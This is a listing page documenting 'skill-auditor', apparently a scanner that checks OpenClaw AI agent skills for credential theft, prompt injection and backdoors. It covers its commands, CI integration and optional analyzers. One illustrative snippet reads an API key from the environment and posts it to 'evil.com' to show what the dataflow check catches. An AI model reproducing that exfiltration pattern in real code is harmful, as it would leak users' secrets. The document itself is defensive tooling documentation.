Security scanner that catches malicious skills before they steal your data. Detects credential theft, prompt injection, and hidden backdoors. Works immediately with zero setup. Optional AST dataflow a
Real data. Real impact.
Emerging
Developers
Per week
Open source
Skills give you superpowers. Install in 30 seconds.
Enhanced security scanner that analyzes skills and provides comprehensive threat detection with advanced analysis capabilities.
Run the setup wizard to configure optional features:
cd skills/skill-auditor node scripts/setup.js
The wizard explains each feature, shows real test data, and lets you choose what to enable.
Scan a skill:
node skills/skill-auditor/scripts/scan-skill.js <skill-directory>
Audit all your installed skills:
node skills/skill-auditor/scripts/audit-installed.js
Run the interactive setup to configure optional features:
cd skills/skill-auditor node scripts/setup.js
The wizard will:
~/.openclaw/skill-auditor.jsonnode scripts/setup.js # Interactive setup wizard node scripts/setup.js --status # Show current configuration node scripts/setup.js --enable-ast # Just enable AST analysis
Scan every skill in your OpenClaw installation at once:
node scripts/audit-installed.js
Options:
node scripts/audit-installed.js --severity critical # Only critical issues node scripts/audit-installed.js --json # Save results to audit-results.json node scripts/audit-installed.js --verbose # Show top findings per skill
Output:
Works on all platforms with just Node.js (which OpenClaw already provides).
Requires Python 3.8+ and tree-sitter packages.
| Platform | Python Install | Tree-sitter Install |
|---|---|---|
| Windows | Pre-installed or | |
| macOS | Pre-installed or | |
| Linux | | |
Note: Tree-sitter has prebuilt wheels for all platforms ā no C++ compiler needed!
Traces data from sources to sinks through code execution paths
npm install tree-sitter tree-sitter-python node scripts/scan-skill.js <skill> --mode strict
What it detects:
Example:
# File 1: utils.py def get_secrets(): return os.environ.get('API_KEY')File 2: main.py
key = get_secrets() requests.post('evil.com', data=key) # ā Dataflow detected!
Scans executable files against 70+ antivirus engines
export VIRUSTOTAL_API_KEY="your-key-here" node scripts/scan-skill.js <skill> --use-virustotal
Supported formats: .exe, .dll, .bin, .wasm, .jar, .apk, etc.
Output includes:
Uses AI to understand if detected behaviors match stated intent
# Requires OpenClaw gateway running node scripts/scan-skill.js <skill> --use-llm
How it works:
Example:
GitHub Code Scanning compatible format
node scripts/scan-skill.js <skill> --format sarif --fail-on-findings
GitHub integration:
# .github/workflows/skill-scan.yml - name: Scan Skills run: | node skill-auditor/scripts/scan-skill.js ./skills/new-skill \ --format sarif --fail-on-findings > results.sarif - name: Upload SARIF uses: github/codeql-action/upload-sarif@v2 with: sarif_file: results.sarif
Adjustable sensitivity levels
--mode strict # All patterns, higher false positives --mode balanced # Default, optimized accuracy --mode permissive # Only critical patterns
# Scan local skill node scripts/scan-skill.js ../my-skillScan with JSON output
node scripts/scan-skill.js ../my-skill --json report.json
Format visual report
node scripts/format-report.js report.json
# Full analysis with all features node scripts/scan-skill.js ../my-skill \ --mode strict \ --use-virustotal \ --use-llm \ --format sarif \ --json full-report.sarifCI/CD integration
node scripts/scan-skill.js ../my-skill
--format sarif
--fail-on-findings
--mode balanced
# Scan GitHub skill without cloning node scripts/scan-url.js "https://github.com/user/skill" --json remote-report.json node scripts/format-report.js remote-report.json
# Works immediately ā no installation needed node skill-auditor/scripts/scan-skill.js <skill>
cd skills/skill-auditorInstall all optional features
npm install
Or install selectively:
npm install tree-sitter tree-sitter-python # AST analysis npm install yara # YARA rules (future)
VirusTotal requires API key only:
export VIRUSTOTAL_API_KEY="your-key"
LLM analysis requires OpenClaw gateway:
openclaw gateway start
{ "skill": { "name": "example", "description": "..." }, "riskLevel": "HIGH", "accuracyScore": { "score": 7, "reason": "..." }, "findings": [...], "summary": { "analyzersUsed": ["static", "ast-python", "llm-semantic"] } }
--format sarif
Uploads to GitHub Security tab, integrates with pull request checks.
node scripts/format-report.js report.json
Human-readable summary with threat gauge and actionable findings.
VIRUSTOTAL_API_KEY="vt-key" # VirusTotal integration DEBUG="1" # Verbose error output
--json <file> # JSON output file --format sarif # SARIF output for GitHub --mode <mode> # strict|balanced|permissive --use-virustotal # Enable binary scanning --use-llm # Enable semantic analysis --custom-rules <dir> # Additional YARA rules --fail-on-findings # Exit code 1 for HIGH/CRITICAL --help # Show all options
skill-auditor/ āāā scripts/ ā āāā scan-skill.js # Main scanner (v2.0) ā āāā scan-url.js # Remote GitHub scanning ā āāā format-report.js # Visual report formatter ā āāā analyzers/ # Pluggable analysis engines ā ā āāā static.js # Core regex patterns (zero-dep) ā ā āāā ast-python.js # Python dataflow analysis ā ā āāā virustotal.js # Binary malware scanning ā ā āāā llm-semantic.js # AI-powered intent analysis ā āāā utils/ ā āāā sarif.js # GitHub Code Scanning output āāā rules/ ā āāā default.yar # YARA format patterns āāā package.json # Optional dependencies āāā references/ # Documentation (unchanged)
v1.x commands work unchanged:
node scan-skill.js <skill-dir> # ā Works node scan-skill.js <skill-dir> --json out.json # ā Works node format-report.js out.json # ā Works
New v2.0 features are opt-in:
node scan-skill.js <skill-dir> --use-llm # ā” Enhanced node scan-skill.js <skill-dir> --use-virustotal # ā” Enhanced
"tree-sitter dependencies not available"
npm install tree-sitter tree-sitter-python
"VirusTotal API error: 403"
export VIRUSTOTAL_API_KEY="your-actual-key"
"LLM semantic analysis failed"
# Check OpenClaw gateway is running: openclaw gateway status curl http://localhost:18789/api/v1/health
"SARIF output not generated"
# Ensure all dependencies installed: cd skills/skill-auditor && npm install
DEBUG=1 node scripts/scan-skill.js <skill>
scripts/analyzers/static.jsrules/scripts/analyzers/ast-python.js# Test against multiple skills: node scripts/scan-skill.js ../blogwatcher --use-llm --mode strict node scripts/scan-skill.js ../summarize --use-virustotal node scripts/scan-skill.js ../secure-browser-agent --format sarif
This scanner is one layer of defense, not a guarantee. Always:
For sensitive environments, enable all advanced features:
node scripts/scan-skill.js <skill> \ --mode strict \ --use-virustotal \ --use-llm \ --fail-on-findings
No automatic installation available. Please visit the source repository for installation instructions.
View Installation Instructions
1,500+ AI skills, agents & workflows. Install in 30 seconds. Part of the Torly.ai family.
Ā© 2026 Torly.ai. All rights reserved.